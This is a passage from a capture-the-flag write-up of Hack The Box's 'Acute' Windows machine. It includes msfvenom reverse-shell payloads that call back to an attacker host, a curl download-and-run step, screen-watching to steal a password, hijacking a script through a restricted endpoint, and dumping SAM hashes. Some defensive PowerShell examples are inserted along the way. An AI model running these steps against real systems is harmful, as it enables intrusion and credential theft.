HTB - Acute

Machine Info

Acute is a hard Windows machine that starts with a website on port 443. The certificate of the website reveals the domain name atsserver.acute.local. Looking around the website, several employees are mentioned, and with this information it is possible to construct a list of possible users on the remote machine. Enumerating the website reveals a form with procedures for newcomers to the company. The form reveals the default password that all accounts are initially set up with, and a link to a Windows PowerShell Web Access (PSWA) session. Combining all the information from the enumeration process, an attacker is able to get into a PowerShell session as the user edavies on Acute-PC01. It is then discovered that edavies is also logged on in an interactive session. By watching the actions of edavies, the clear-text password of the imonks user for ATSSERVER can be retrieved. The user imonks runs under Just Enough Administration (JEA) on ATSSERVER, but even with the limited command set an attacker is able to modify a script on ATSSERVER in order to make edavies a local administrator on Acute-PC01. Now that edavies is a local administrator, the HKLM\sam and HKLM\system hives can be retrieved from the system in order to extract the password hashes of all the users. The Administrator hash turns out to be crackable, and the clear-text password is re-used by awallace on ATSSERVER. The user awallace is able to create BAT scripts in a directory where the user Lois will execute them. Lois has the rights to add imonks to the site_admin group, which in turn has rights over the Domain Admins group. So, after imonks is added to the site_admin group he can add himself to the Domain Admins group and acquire administrative privileges.

Enumeration


Scope

IP Address: 10.10.11.145

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
443/tcp open  https

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p 443 -sCV $ip -oN Nmap/script-scan

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_ssl-date: 2024-07-22T08:03:32+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* Open ports: 443 
* Services: HTTPS
* Important notes: DNS:atsserver.acute.local, DNS:atsserver

First, I added the domain name, FQDN and computer name to the hosts file:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ sudo sh -c "echo  '$ip acute.local atsserver.acute.local atsserver' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.145 acute.local atsserver.acute.local atsserver

HTTP Enumeration

Subdomain enumeration didn't find anything:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/GreenHorn]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.acute.local" -k -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/  

:: Progress: [19966/19966] :: Job [1/1] :: 208 req/sec :: Duration: [0:01:35] :: Errors: 0 ::

https://acute.local/

However, atsserver.acute.local hosts a web app.

Several users are mentioned on the site, but I need to know the username format.

In the top right of the page, there is a link to a .docx file.

When I clicked it, the file was downloaded to my Kali machine, so I will explore it locally.

Looking at the file details:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ exiftool New_Starter_CheckList_v7.docx 
<snip>
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
<snip>

The creator of the file is FCastle, who is not in my user list, so I will add him first, along with Daniel, who last modified the file. It also gives a hint that the username format is first letter of the first name + last name, so the user list should look like this:

Fcastle
Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins

Another important detail is "Created on Acute-PC01", which tells us there is a computer named Acute-PC01.

So we now have two computer names:

atsserver
Acute-PC01

I opened the docx file and it looks like this:

There are two new links that I want to explore.

https://atsserver.acute.local/Staff
https://atsserver.acute.local/Staff/Induction

Both pages respond with 404.

This row says that the default password is Password1! and that several users still have this password.

PSWA means PowerShell Web Access, and dc_manage seems to be some kind of restricted session configuration.

The last row has a link which takes me to https://atsserver.acute.local/Acute_Staff_Access

At the end, I can see that there is a group named site admin and that Lois has control of it.

Shell as Edavies

https://atsserver.acute.local/Acute_Staff_Access

It's a PowerShell Web Access console. I have the password, two computer names and several users, so I will try them.

When providing wrong credentials, this message appears:

A new message appears for the user Chall saying that we aren't authorized to connect to that computer name, so I will try the other one.

When I changed the computer name to Acute-PC01 and tried to authenticate as chall, it also failed. However, when I tried Edavies it took me to the PowerShell console.

jmorgan and Natasha exist on the machine along with edavies.

PS C:\Users> dir

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/21/2021   1:01 PM                administrator.ACUTE
d-----        12/22/2021   1:26 AM                edavies
d-----        12/21/2021  10:50 PM                jmorgan
d-----        11/19/2021   9:29 AM                Natasha
d-r---        11/18/2020  11:43 PM                Public
PS C:\Users> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

I want to see who is a member of Remote Management Users. Querying the domain group failed, so I switched to querying the local group and got a result:

PS C:\Users> net group "Remote Management Users"

net : This command can be used only on a Windows Domain Controller.
    + CategoryInfo          : NotSpecified: (This command ca...ain Controller.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
More help is available by typing NET HELPMSG 3515.

PS C:\Users> net localgroup "Remote Management Users"

Members
-------------------------------------------------------------------------------
ACUTE\edavies
The command completed successfully.

I also looked at the Administrators group and found that jmorgan is a member of it:

PS C:\Users> net localgroup "administrators"

Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator

I need to upgrade my shell, so I can use either nc or a meterpreter shell. In our situation a meterpreter shell is better, and we will see why in a few steps.

At the root of the file system there is a non-standard folder, Utils:

PS C:\> dir

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----

d-----         12/7/2019   9:14 AM                PerfLogs
d-r---         12/6/2021  11:06 AM                Program Files
d-r---         12/7/2021  12:43 PM                Program Files (x86)
d-r---        12/21/2021  10:50 PM                Users
d-----         1/31/2022  12:29 AM                Utils
d-----        12/16/2021   1:23 AM                Windows

Viewing the folder permissions, I found that edavies has (M) modify permission, which means he can read, write, execute and delete:

PS C:\> icacls Utils

Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
      BUILTIN\Administrators:(OI)(CI)(F)
      ACUTE\edavies:(OI)(CI)(M)
      BUILTIN\Users:(OI)(CI)(R)

I don't know why this folder exists, but I will continue from it as I have permissions on it.

Creating a meterpreter shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=443 -f exe -o shell.exe

Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

Start the Metasploit framework and listen for the connection:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfconsole -q                                                                                 
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:443 

Download the shell and execute it.

PS C:\Utils> curl 10.10.16.7/shell.exe -o .\shell.exe
PS C:\Utils> .\shell.exe

Receiving a connection back

[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.16.7:443 -> 10.10.11.145:49848) at 2024-07-22 05:06:10 -0400

meterpreter > getuid
Server username: ACUTE\edavies

Shell as imonks

Personally, I didn't know what to do next as no escalation path was clear to me, so I took a hint: you can use the screenshare feature of a meterpreter session to capture the desktop.

meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/study/Courses/HackThebox/HTB/machines/Acute/UjBPiFCw.html
[*] Streaming...

An HTML page opens, and I waited for something useful to appear.

If you get error like this:

[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>

use the command the message itself names, from the msfconsole prompt, and then start screenshare again:

msf6 exploit(multi/handler) > sessions --interact 1 --timeout 30000
meterpreter > screenshare

After a few moments, a new PowerShell console is opened and several commands are entered:

Enter-PSsession -Computername atsserver
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd) 

I now have new user credentials: imonks:W3_4R3_th3_f0rce.

I also noticed that the Enter-PSSession attempt failed, and that it used the dc_manage configuration.

From meterpreter, I started a shell and tried to execute commands as imonks:

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd)

Enter-PSSession failed as we saw in the screenshot, so I tried Invoke-Command, which worked :)

PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami}
acute\imonks
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls -Recurse C:\Users\imonks}

    Directory: C:\Users\imonks

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
d-r---        21/12/2021     22:29                Desktop                            atsserver                         
d-r---        21/12/2021     16:01                Documents                          atsserver                         
d-r---        15/09/2018     08:12                Downloads                          atsserver                         
d-r---        15/09/2018     08:12                Favorites                          atsserver                         
d-r---        15/09/2018     08:12                Links                              atsserver                         
d-r---        15/09/2018     08:12                Music                              atsserver                         
d-r---        15/09/2018     08:12                Pictures                           atsserver                         
d-----        15/09/2018     08:12                Saved Games                        atsserver                         
d-r---        15/09/2018     08:12                Videos                             atsserver                         

    Directory: C:\Users\imonks\Desktop

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
-ar---        22/07/2024     08:58             34 user.txt                           atsserver                         
-a----        11/01/2022     18:04            602 wm.ps1                             atsserver  

The user flag is there along with wm.ps1 file.

Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\user.txt}

42fd899d0cffc822513f80xxxxxxxxxxxxx

User Flag: 42fd899d0cffc822513xxxxxxxxxxxxx

Shell as Jmorgan

wm.ps1 contains a PowerShell credential for the jmorgan user, who we know is a local admin on Acute-PC01:

Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

I couldn't run the script as is from edavies, because he isn't the user who created this file (the encrypted password is tied to the creating account), so I will run the script as imonks to get a shell as jmorgan.

But first I will modify the script to send me a shell.
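Why the encrypted string in wm.ps1 only works for the account that produced it, as an added example (this is not code from the writeup or from the box; the file path and the test value are hypothetical). ConvertFrom-SecureString without -Key encrypts with DPAPI under the current user's master key, so only that same user on that same machine can turn the blob back into a SecureString:

```powershell
# Added example, not part of the writeup: a ConvertFrom-SecureString blob (the shape of
# $securepasswd in wm.ps1) is bound by DPAPI to the user and machine that created it.
# Paths and the test value are hypothetical.

function Protect-TestSecret {
    param([string]$Path = "$env:TEMP\dpapi-demo.txt")
    # Constructed test value; a real script would take it from Read-Host -AsSecureString.
    $secure = ConvertTo-SecureString 'ExampleValueOnly!' -AsPlainText -Force
    # No -Key: DPAPI, current-user scope. The output is the long hex string seen in wm.ps1.
    $secure | ConvertFrom-SecureString | Set-Content -Path $Path
    return $Path
}

function Test-DpapiBlob {
    # Returns $true if the calling account can decrypt the blob at $Path, $false otherwise.
    param([Parameter(Mandatory)][string]$Path)
    try {
        $secure = Get-Content -Path $Path | ConvertTo-SecureString
        # Round-trip to plaintext only to prove the key matched; never log this in real use.
        $null = [System.Net.NetworkCredential]::new('', $secure).Password
        return $true
    } catch {
        # Any other user, or the same user on another host, lands here with
        # "Key not valid for use in specified state."
        Write-Verbose "Cannot decrypt as ${env:USERDOMAIN}\${env:USERNAME}: $($_.Exception.Message)"
        return $false
    }
}

$blobPath = Protect-TestSecret
Test-DpapiBlob -Path $blobPath   # $true for the account that ran Protect-TestSecret, $false for anyone else
```

The protection is per account, not per file: it stops a different user who can read wm.ps1 from recovering the password, but it does nothing against anyone who can execute code as the owning account, which is exactly what a remoting endpoint that exposes Set-Content on that user's files hands out. The portable alternative, ConvertFrom-SecureString -Key, is no better in that situation because the AES key has to be stored somewhere the script can reach.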

Creating a meterpreter payload to receive a connection as jmorgan:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=8443 -f exe -o jmorgan.exe

Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: jmorgan.exe

Start listening with Metasploit:

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:8443 
msf6 exploit(multi/handler) > jobs

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://10.10.16.7:8443

I want to modify the wm.ps1 script, so I ran Get-Command to see which commands I can run:

PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Command}      
CommandType     Name                                               Version    Source               PSComputerName      
-----------     ----                                               -------    ------               --------------      
Cmdlet          Get-Alias                                          3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-ChildItem                                      3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-Command                                        3.0.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-Content                                        3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-Location                                       3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Set-Content                                        3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Set-Location                                       3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Write-Output                                       3.1.0.0    Microsoft.PowerSh... atsserver           


PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Alias}      
CommandType     Name                                               Version    Source               PSComputerName      
-----------     ----                                               -------    ------               --------------      
Alias           cat -> Get-Content                                                                 atsserver           
Alias           cd -> Set-Location                                                                 atsserver           
Alias           echo -> Write-Output                                                               atsserver           
Alias           ls -> Get-ChildItem                                                                atsserver           
Alias           pwd -> Get-Location                                                                atsserver           
Alias           sc -> Set-Content                                                                  atsserver           
Alias           type -> Get-Content                                                                atsserver 
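How a JEA endpoint ends up exposing exactly this cmdlet list, and how the same endpoint could be defined so that Set-Content cannot rewrite arbitrary files, as an added example (this is not Acute's real dc_manage configuration; the file paths, the transcript directory and the group name acute\JEA-DcManage are hypothetical):

```powershell
# Added example, not the box's real configuration: JEA role capability and session
# configuration for an endpoint named dc_manage. Paths and the group name are hypothetical.
# Run elevated on the server that hosts the endpoint.

# 1. Loose role: the cmdlet list seen on atsserver, with Set-Content unconstrained.
#    Anyone mapped to this role can overwrite any file the session identity can write,
#    including scripts that are later executed under other credentials.
New-PSRoleCapabilityFile -Path 'C:\JEA\RoleCapabilities\DcManage-Loose.psrc' -VisibleCmdlets @(
    'Get-Alias', 'Get-ChildItem', 'Get-Command', 'Get-Content',
    'Get-Location', 'Set-Content', 'Set-Location', 'Write-Output'
)

# 2. Tightened role: same read-only cmdlets, but Set-Content only accepts a -Path under
#    one report directory plus -Value; JEA rejects any other parameter or path.
New-PSRoleCapabilityFile -Path 'C:\JEA\RoleCapabilities\DcManage-Tight.psrc' -VisibleCmdlets @(
    'Get-Alias', 'Get-ChildItem', 'Get-Command', 'Get-Content',
    'Get-Location', 'Set-Location', 'Write-Output',
    @{
        Name       = 'Set-Content'
        Parameters = @(
            @{ Name = 'Path'; ValidatePattern = '^C:\\Reports\\[A-Za-z0-9_-]+\.txt$' },
            @{ Name = 'Value' }
        )
    }
)

# 3. Session configuration: restricted endpoint, transcript of every command, and the
#    role mapped to a dedicated group rather than to individual users.
New-PSSessionConfigurationFile -Path 'C:\JEA\dc_manage.pssc' `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEA\Transcripts' `
    -RoleDefinitions @{
        'acute\JEA-DcManage' = @{ RoleCapabilityFiles = 'C:\JEA\RoleCapabilities\DcManage-Tight.psrc' }
    }

# 4. Validate the file, then register it under the name clients pass as -ConfigurationName.
#    Register-PSSessionConfiguration restarts the WinRM service.
if (Test-PSSessionConfigurationFile -Path 'C:\JEA\dc_manage.pssc') {
    Register-PSSessionConfiguration -Name 'dc_manage' -Path 'C:\JEA\dc_manage.pssc' -Force
}
```

Two things differ from what the writeup observes on atsserver. First, whoami there returns acute\imonks, so that endpoint runs as the connecting user; with -RunAsVirtualAccount the commands run as a temporary local account instead, so a script in the user's profile that relies on DPAPI under that user's key would not decrypt from inside the session. Second, the only visible write primitive is constrained by ValidatePattern, so the list of cmdlets a user sees from Get-Command is no longer enough to reach files outside the intended directory.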

I will use Set-Content to write the following lines to the script:

Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51"
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds' -Path C:\Users\imonks\Desktop\wm.ps1}

Check that everything is correct:

Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}

$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51"
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds

Trigger the script:

Invoke-Command -Credential $cred -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}

[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.7:8443 -> 10.10.11.145:49786) at 2024-07-22 06:04:23 -0400
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x64/windows  ACUTE\edavies @ ACUTE-PC01  10.10.16.7:443 -> 10.10.11.145:49848 (172.16.22.2)
  2         meterpreter x64/windows  ACUTE\jmorgan @ ACUTE-PC01  10.10.16.7:8443 -> 10.10.11.145:49786 (172.16.22.2)

msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: ACUTE\jmorgan
PS C:\Users\jmorgan\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Shell as awallace

I will use the hashdump feature to dump the hashes and try to crack them:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
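Reading pwdump-style output like the above is easier with a small parser that knows the two well-known "empty" values, so an auditor can tell disabled or passwordless accounts apart from accounts that actually have a password to protect. This is an added example, not code from the writeup or from Metasploit; the sample lines are constructed:

```powershell
# Added example, not part of the writeup: parse user:RID:LM:NT::: lines as printed by
# meterpreter's hashdump and flag the well-known empty hashes. Sample lines are constructed.

$EmptyLm = 'aad3b435b51404eeaad3b435b51404ee'   # LM hash of the empty string: LM storage is off
$EmptyNt = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty string: no password set

function ConvertFrom-PwDump {
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($line in $Lines) {
        # -match is case-insensitive, so upper-case hex is accepted too.
        if ($line -notmatch '^(?<user>[^:]+):(?<rid>\d+):(?<lm>[0-9a-f]{32}):(?<nt>[0-9a-f]{32}):::$') {
            Write-Warning "Skipping unparseable line: $line"
            continue
        }
        [pscustomobject]@{
            User           = $Matches.user
            Rid            = [int]$Matches.rid
            LmHash         = $Matches.lm
            NtHash         = $Matches.nt
            IsBuiltInAdmin = ([int]$Matches.rid -eq 500)   # RID 500 is the built-in Administrator, whatever its name
            LmStored       = ($Matches.lm -ne $EmptyLm)    # a real LM hash means the legacy weak format is still kept
            EmptyPassword  = ($Matches.nt -eq $EmptyNt)
        }
    }
}

# Constructed sample in the same shape as hashdump output (hashes are placeholders).
$sample = @(
    'Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::',
    'Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::',
    'svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::',
    'not a hash line'
)

$accounts = ConvertFrom-PwDump -Lines $sample
# Accounts with a real password (the ones a password policy and rotation actually protect):
$accounts | Where-Object { -not $_.EmptyPassword } | Format-Table User, Rid, IsBuiltInAdmin, LmStored
# Accounts with no password at all; expected for disabled built-ins such as Guest, a finding otherwise:
$accounts | Where-Object EmptyPassword | ForEach-Object { Write-Warning "$($_.User) has an empty password" }
```

On the output above, Guest and DefaultAccount carry the empty NT hash, so they are not candidates for anything, while every account carries the empty LM value, meaning LM storage is disabled as it should be. An NT hash that resolves instantly on a public lookup site means the password already sits in a public wordlist, which is the finding a defender takes away from this step.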

Only the Administrator hash was cracked, using https://crackstation.net/

I want to know which users exist on atsserver:

Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls C:\Users}


    Directory: C:\Users

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
d-----        20/12/2021     23:30                .NET v4.5                          atsserver                         
d-----        20/12/2021     23:30                .NET v4.5 Classic                  atsserver                         
d-----        20/12/2021     20:38                Administrator                      atsserver                         
d-----        21/12/2021     23:31                awallace                           atsserver                         
d-----        21/12/2021     16:01                imonks                             atsserver                         
d-----        22/12/2021     00:11                lhopkins                           atsserver                         
d-r---        20/12/2021     20:38                Public                             atsserver

I will try to authenticate as these users with the Administrator password I cracked:

$password = ConvertTo-SecureString -AsplainText -Force 'Password@123'
$Credential = New-Object System.Management.Automation.PSCredential("acute\awallace", $password)

I got a hit with the awallace user:

PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami}
acute\awallace

I tried to enumerate the Program Files folder before as imonks but got Access Denied, so I will enumerate it again as awallace:

Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files"}

    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
d-----        21/12/2021     00:04                common files                       atsserver                         
d-----        21/12/2021     00:11                Hyper-V                            atsserver                         
d-----        15/09/2018     08:12                internet explorer                  atsserver                         
d-----        01/02/2022     19:41                keepmeon                           atsserver                         
d-----        21/12/2021     00:04                VMware                             atsserver                         
d-----        20/12/2021     21:19                Windows Defender                   atsserver                         
d-----        20/12/2021     21:12                Windows Defender Advanced Threat   atsserver                         
                                                  Protection
d-----        21/12/2021     14:13                WindowsPowerShell                  atsserver 

I will look at keepmeon this time:

PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files\keepmeon"}

    Directory: C:\Program Files\keepmeon

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
-a----        21/12/2021     14:57            128 keepmeon.bat                       atsserver  

Listing the content of the file gives this script:

PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat "C:\Program Files\keepmeon\keepmeon.bat"}

REM This is run every 5 minutes. For Lois use ONLY
@echo off
 for /R %%x in (*.bat) do (
 if not "%%x" == "%~0" call "%%x"
)

Asking ChatGPT about the exact function of that script: for /R walks the current directory tree, and for every .bat file it finds (except the script itself, %~0) it calls that file. The comment says it runs every 5 minutes and is for Lois only.

So, I can create a .bat file and get it executed within 5 minutes as Lois, as the comment says. We also saw that Lois is the only user who can add members to the Site_Admin group, so I will add jmorgan to that group and get Domain Admins privileges.
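The weakness here is not the batch file but the combination of "run every .bat you find" with a directory that a non-administrative user can write to. The following added check (not code from the writeup or from the box; the directory default, the expected script name and the trusted-principal list are hypothetical) reports every ACE that lets a non-admin principal create or change files under such a directory, plus any .bat files that are not supposed to be there:

```powershell
# Added example, not part of the writeup: audit a directory whose .bat files are executed
# by a scheduled job (the keepmeon pattern). Directory and expected file names are hypothetical.

function Get-WritableByNonAdmin {
    # Returns one object per Allow ACE that grants a write-type right to a principal
    # outside the trusted list.
    param([Parameter(Mandatory)][string]$Path)
    $trusted = @(
        'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
        'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'
    )
    # Any of these rights is enough to drop or alter a script in the directory.
    $writeBits = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
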